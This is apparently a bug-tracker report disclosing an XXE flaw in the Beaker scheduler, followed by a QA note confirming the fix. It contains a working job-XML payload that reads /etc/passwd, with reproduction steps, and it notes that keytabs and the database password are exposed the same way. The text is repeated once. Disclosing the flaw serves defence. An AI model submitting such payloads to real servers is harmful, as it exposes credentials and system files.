Description of problem:
Beaker is vulnerable to "XXE" (XML external entity) attacks. An authenticated user can submit a job XML to the scheduler containing entity references which reference files from the Beaker server's filesystem, thereby causing the contents to be disclosed in the web UI.
For example:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<job>
<whiteboard>&xxe;</whiteboard>
<recipeSet>
<recipe>
<distroRequires>
<distro_arch op="=" value="x86_64"/>
</distroRequires>
<hostRequires/>
<task name="/distribution/install" role="STANDALONE"/>
</recipe>
</recipeSet>
</job>
This can be exploited to reveal sensitive information from the filesystem accessible by the apache user, including Kerberos keytabs and the database password in /etc/beaker/server.cfg.
Note that there are no known ways to exploit this as an anonymous user. It requires malicious action from a user with a valid Beaker account.
Version-Release number of selected component (if applicable):
all Beaker versions are vulnerable
Steps to Reproduce:
1. Log in to Beaker as any user account
2. Submit a specially craft job using external entity expansion, as per the above example
3. View the job in the web UI
Actual results:
Contents of /etc/passwd are revealed in the job whiteboard.
Expected results:
Job should not be accepted, it should fail to parse due to an undefined entity.
Additional info:
https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
Verified this issue.
The result is PASS.
Version: Beaker 20.1.git.5.24dc482
Steps:
1. Log in to Beaker as any user account
2. Submit a specially craft job using external entity expansion, as per the above example in description
Result: Failed to import job
Description of problem: Beaker is vulnerable to "XXE" (XML external entity) attacks. An authenticated user can submit a job XML to the scheduler containing entity references which reference files from the Beaker server's filesystem, thereby causing the contents to be disclosed in the web UI. For example: <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <job> <whiteboard>&xxe;</whiteboard> <recipeSet> <recipe> <distroRequires> <distro_arch op="=" value="x86_64"/> </distroRequires> <hostRequires/> <task name="/distribution/install" role="STANDALONE"/> </recipe> </recipeSet> </job> This can be exploited to reveal sensitive information from the filesystem accessible by the apache user, including Kerberos keytabs and the database password in /etc/beaker/server.cfg. Note that there are no known ways to exploit this as an anonymous user. It requires malicious action from a user with a valid Beaker account. Version-Release number of selected component (if applicable): all Beaker versions are vulnerable Steps to Reproduce: 1. Log in to Beaker as any user account 2. Submit a specially craft job using external entity expansion, as per the above example 3. View the job in the web UI Actual results: Contents of /etc/passwd are revealed in the job whiteboard. Expected results: Job should not be accepted, it should fail to parse due to an undefined entity. Additional info: https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing